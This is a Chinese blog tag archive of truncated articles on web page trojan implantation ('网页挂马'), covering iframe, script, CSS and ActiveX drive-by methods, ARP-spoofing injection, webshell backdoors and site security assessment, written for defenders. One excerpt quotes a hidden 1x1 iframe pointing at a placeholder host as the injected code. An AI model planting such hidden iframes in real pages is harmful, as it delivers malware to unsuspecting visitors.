标签存档: 网页挂马

网页IFRAME框架挂马的原理与防范/网页挂马木马

当前网络安全最大的危险是什么?很多人都会说是网页挂马。没错!为了大规模盗号,挂马的网页在去年数以千万计的增长。普通网民知道怎么在电脑中防范网页挂
马就可以了,从事和想从事与网络安全相关工作的朋友就要多掌握一些知识,知道网页挂马到底是怎么进行的,有哪几种方式。知己知彼,就会更好地维护网吧、网
站等,就会增加自己的安全技能,逐渐成长为一名安全工程师。
  一名优秀的安全工程师,要能独立负责网站安全、局域网安全、服务器安全等,要了解网页挂马有IFRAME框架挂马、JS文件挂马、伪装挂马、CSS挂马、ActiveX组件挂马等方式,这样才可以有针对性地进行防范,避免网站和服务器等安全威胁。下面,我们来迈出成长为安全工程师的第一步,掌握IFRAME框架挂马的底细以及相应的防范方法。  
阅读全文——共1379字

ARP挂马,某些网站被挂马的真正原因

现象:访问服务器上的任何网页,就连404的页面也会在后加入:
   <iframe src=”http://www.aaaa.com/a.htm” frameborder=”0″ height=”1″ width=”1″></iframe>通过ftp查看但这些页面(指静态HTML文件)里面并没有这样的代码,但浏览器访问就会出现。如果发生这种情况,可以肯定,是服务器中了ARP木马,不是web程序的问题
什么是ARP
   地址解析协议(Address Resolution Protocol,ARP)是在仅知道主机的IP地址时确定其物理地址的一种协议。因IPv4和以太网的广泛应用,其主要用作将IP地址翻译为以太网的 MAC地址,但其也能在ATM和FDDIIP网络中使用。从IP地址到物理地址的映射有两种方式:表格方式和非表格方式。ARP具体说来就是将网络层(IP层,也就是相当于OSI的第三层)地址解析为数据连接层(MAC层,也就是相当于OSI的第二层)的MAC地址。
阅读全文——共4047字

网页挂马原理,行为分析,应对策略

通常,微软IE工作过程描述如下:

作为网页挂马的散布者,其目的是将木马下载到用户本地,并进一步执行,当木马获得执行之后,就意味着会有更多的木马被下载,进一步被执行,进入 一个恶性的循环,从而使用户的电脑遭到攻击和控制。为达到目的首先要将木马下载到本地。根据上图的流程,常见的方式有以下几种:
1.将木马伪装为页面元素。木马则会被浏览器自动下载到本地。
阅读全文——共1344字

网页挂马的来龙去脉/原理实现手段 防范对策

很多朋友都碰到过这样的现象:打开一个网站,结果页面还没显示,杀毒软件就开始报警,提示检测到木马病毒。有经验的朋友会知道这是网页恶意代码,但是 自己打开的明明是正规网站,没有哪家正规网站会将病毒放在自己的网页上吧?那么是什么导致了这种现象的发生呢?其中最有可能的一个原因就是:这个网站被挂 马了。
“挂马”这个词目前我们似乎经常能听到,那么什么是挂马呢?挂马就是黑客入侵了一些网站后,将自己编写的网页木马嵌入被黑网站 的主页中,利用被黑网站的流量将自己的网页木马传播开去,以达到自己不可告人的目的。例如很多游戏网站被挂马,黑客的目的就是盗取浏览该网站玩家的游戏账 号,而那些大型网站被挂马,则是为了搜集大量的肉鸡。网站被挂马不仅会让自己的网站失去信誉,丢失大量客户,也会让我们这些普通用户陷入黑客设下的陷阱, 沦为黑客的肉鸡。下面就让我们来了解这种时下最流行的黑客攻击手段。
阅读全文——共2957字

网页后门与网页挂马原理揭密

网站被挂马,被植入后门,这是管理员们无论如何都无法忍受的。Web服务器被攻克不算,还“城门失火殃及池鱼”,网站的浏览者也不能幸免。这无论是对企业 的信誉,还是对管理员的技术能力都是沉重的打击。下面笔者结合实例对网页后门及其网页挂马的技术进行解析,知己知彼,拒绝攻击。
一、前置知识
网页后门其实就是一段网页代码,主要以ASP和PHP代码为主。由于这些代码都运行在服务器端,攻击者通过这段精心设计的代码,在服务器端进行 某些危险的操作,获得某些敏感的技术信息或者通过渗透,提权获得服务器的控制权。并且这也是攻击者控制服务器的一条通道,比一般的入侵更具有隐蔽性。
网页挂马就是攻击者通过在正常的页面中(通常是网站的主页)插入一段代码。浏览者在打开该页面的时候,这段代码被执行,然后下载并运行某木马的服务器端程序,进而控制浏览者的主机。
阅读全文——共4254字

网页挂马/网页木马

何谓「网页挂马」
「网页挂马」又称之为网页隐藏式恶意连结。简单来说,其攻击模式分成四个步骤:
1. 骇客攻击企业组织或政府机关的网站,网页遭到窜改,植入一段恶意连结,或者是设立恶意网站,透过各种宣传手法,吸引民众到站浏览
2. 网站的使用者连上该网站。
阅读全文——共335字

web服务器安全:防范网页挂马攻击 从对WEB站点进行安全评估开始

对于一些大型网站来说,通常拥有一整套已经执行了的WEB站点安全防范解决方案,但是,为什么一些网站还是会被攻击者挂载木马?其中一个最主要的原因是已 经实施的WEB站点安全解决方案只能够应对已经出现的安全漏洞和威 胁。而攻击者总是在通过各种手段来分析网站中可能会存在的弱点或漏洞,以便能够成功绕过网站当前的安全防范措施来实施挂马攻击。针对这样的一种WEB站点 安全现状,最好的方式就是在部署相应的安全防范安全解决方案的同时,还必需采取与攻击者相同的手段,也就是在网站的运营过程中,不断对它进行安全评估,以 此来找到网站中可能存在的弱点和漏洞。
对WEB站点进行安全评估是WEB安全防范处理 过程中非常重要的一个环节,它应当贯穿站点的整个生命周期。对WEB站点实施安全评估的目的就是指安全评估人员,使用相应的评估工具和技术,经过一系列恰当的方法,对 WEB服务器本身、服务器系统、后台数据库系统及网络中已经实施的安全机制,进行全面的检测和评估,以此来检测整个WEB系统是否还存在弱点,以及验证实 施的安全机制是否有效。并根据最后的评估分析结果,对现有的安全策略进行修订,对实施的安全机制进行补充。
阅读全文——共5198字